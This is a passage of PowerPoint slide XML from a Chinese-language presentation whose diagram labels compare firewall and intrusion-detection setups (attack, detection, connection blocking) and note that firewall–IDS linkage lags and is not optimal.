          <a:xfrm rot="16200000">
            <a:off x="5491163" y="4532313"/>
            <a:ext cx="493712" cy="182562"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 62702"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:sysClr val="window" lastClr="CCE8CF"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prst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84" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0337655B-AC87-5442-EE51-0FDE2AF2083B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5327650" y="4819651"/>
            <a:ext cx="896938" cy="169863"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 142757"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:sysClr val="window" lastClr="CCE8CF"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prst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pic>
        <p:nvPicPr>
          <p:cNvPr id="85" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5EC6E5D-07EB-7C06-77A4-AD24EA6F8A11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4862514" y="4727575"/>
            <a:ext cx="465137" cy="465138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3B6ABA-8F1D-4033-3B23-A7E150376A15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6259513" y="4654551"/>
            <a:ext cx="366712" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87" name="Object 104" descr="npo000064">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ED4BC37-F517-34C9-A781-292DFE325793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5548314" y="4625976"/>
            <a:ext cx="395287" cy="492125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="88" name="AutoShape 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72EA189E-5AB6-73D1-C02E-DFD63966D38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="81" idx="2"/>
            <a:endCxn id="85" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5518151" y="4149726"/>
            <a:ext cx="452437" cy="703262"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="EA157A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="38000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="89" name="AutoShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F44B8A7D-19AD-E600-F0E9-28E0A2AE3238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="81" idx="2"/>
            <a:endCxn id="86" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6284913" y="4086225"/>
            <a:ext cx="379412" cy="757238"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="EA157A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="38000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Text Box 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26235472-E9B1-C1BF-3CE7-C61286C94BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5384319" y="5033964"/>
            <a:ext cx="723276" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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①</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攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Text Box 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF0DE4D2-A088-FC22-4F7B-B0C4BCBC648A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5800725" y="4140201"/>
            <a:ext cx="1261884" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pP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③</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将连接阻断</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Text Box 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0498868C-09F3-E42F-36C6-4A3EE27E491C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4760264" y="5908568"/>
            <a:ext cx="5151066" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="windowText" lastClr="000000">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:sys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defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="华文细黑" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="CCE8CF"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>三种方式、逐渐进步，但都未达到最优</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="AutoShape 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB444823-7F3C-010C-E236-A1172338BDB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7186614" y="1262381"/>
            <a:ext cx="2725737" cy="3311525"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6222"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="738AC8">
                  <a:tint val="50000"/>
                  <a:satMod val="300000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="35000">
                <a:srgbClr val="738AC8">
                  <a:tint val="37000"/>
                  <a:satMod val="300000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="738AC8">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="738AC8">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endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="AutoShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E92DE6B-CF85-F03A-0030-37A130CD8F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451726" y="1375094"/>
            <a:ext cx="2195513" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="738AC8"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="738AC8">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="CCE8CF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>防火墙与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="CCE8CF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="CCE8CF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>联动，没有标准协议，有滞后现象，非最优方案</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{491210C5-E2A4-F1E9-FCF9-192A00350EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8159751" y="2638744"/>
            <a:ext cx="796925" cy="752475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF35F3A2-12EB-AAB5-1233-8642E5021F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8613775" y="2502219"/>
            <a:ext cx="1261884" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pP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②</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检测到攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA03CC07-916C-CB9E-259E-F494B2674489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="8304213" y="3657918"/>
            <a:ext cx="493712" cy="182562"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 62702"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:sysClr val="window" lastClr="CCE8CF"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prst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98" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDBAB0F4-2862-629E-8CF9-09210F422AB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8142289" y="3945256"/>
            <a:ext cx="896937" cy="169863"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 142757"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:sysClr val="window" lastClr="CCE8CF"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prst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pic>
        <p:nvPicPr>
          <p:cNvPr id="99" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C46F55B1-4C32-C5A8-C95B-04AAD26A9DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7675564" y="3853180"/>
            <a:ext cx="466725" cy="465138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630B75F3-5FF5-870D-8A29-A17E40E5AED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9074151" y="3780156"/>
            <a:ext cx="365125" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="101" name="AutoShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{338FC13E-CA2A-471C-1498-241EA316DC18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="95" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9545638" y="3014981"/>
            <a:ext cx="30162" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -263538"/>
              <a:gd name="adj2" fmla="val 70260"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="EA157A"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="38000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Text Box 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A748107-39A1-17E9-539B-EA3B4090910D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8197369" y="4161156"/>
            <a:ext cx="723276" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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①</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攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Text Box 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0682CB26-AD4C-5E70-E876-EA56A57F1657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8574971" y="3130868"/>
            <a:ext cx="1261885" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
